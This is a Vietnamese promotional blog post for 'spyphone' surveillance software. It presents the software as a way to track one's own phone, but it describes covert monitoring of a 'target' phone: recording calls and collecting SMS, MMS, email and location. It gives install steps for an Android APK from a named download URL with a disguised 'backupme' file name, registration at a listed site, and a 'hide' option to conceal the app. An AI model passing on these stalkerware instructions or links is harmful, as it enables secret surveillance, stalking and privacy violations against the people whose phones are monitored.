Cách Theo Dõi Điện Thoại Của Bạn


Vấn đề quản lý giám sát điện thoại sẽ trở nên rễ ràng hơn bao giờ hết. Bài viết này tôi sẽ hướng dẫn mọi người làm thế nào để theo dõi và quản lý điện thoại một cách đơn giản mà hiệu quả nhất.
Theo dõi điện thoại bạn đã thử chưa?. Phần mềm theo dõi điện thoại với cái tên quốc tế spyphone là sản phẩm được nhiều sự quan tâm của giới công nghệ theo dõi và được đánh giá: hiện đại và bí mật nhất. Nó được cài đặt trong chiếc điện thoại của bạn để thu thập mọi dữ liệu hoạt động. Bằng cách ghi âm cuộc đàm thoại, lưu lại toàn bộ tin nhắn SMS, MMS, E-mail, xác định vị trí hiện tại.

Hướng dẫn cách theo dõi điện thoại

Cách theo dõi điện thoại đơn giản:

Sau đây tôi hưỡng dẫn mọi người cài đặt cách theo dõi điện thoại bằng phần mềm trực tiếp trên thiết bị Android. Hãy chắc chắn rằng bạn đang cầm chiếc điện thoại trên tay và có kết nối 3G hoặc wifi. Dùng chiếc điện thoại truy cập đến app.hostoi.com/backupme.apk nó sẽ tự động download phần mềm theo dõi điện thoại về máy sau khi download thành công bạn chọn “trình cài đặt gói” quá trình cài đặt sẽ diễn ra trong vòng 1 phút. Một số điện thoai cảm ứng spyphone sẽ hiện ra ở màn hình chính và chỉ việc khỏi động. Sau đó xác nhận Key ID mà mình đã đăng ký từ trước tại trang chủ  Daddyseye.com ). Cuối cùng là chọn “hide” nếu bạn muốn ẩn phần mềm, chỉ cần đợi vài phút sau đó là các dữ liệu theo dõi từ điện thoại mục tiêu sẽ về bảng thông tin theo dõi.

 

 

 

Từ khóa:   ·

Bài khác của spyphonevn.com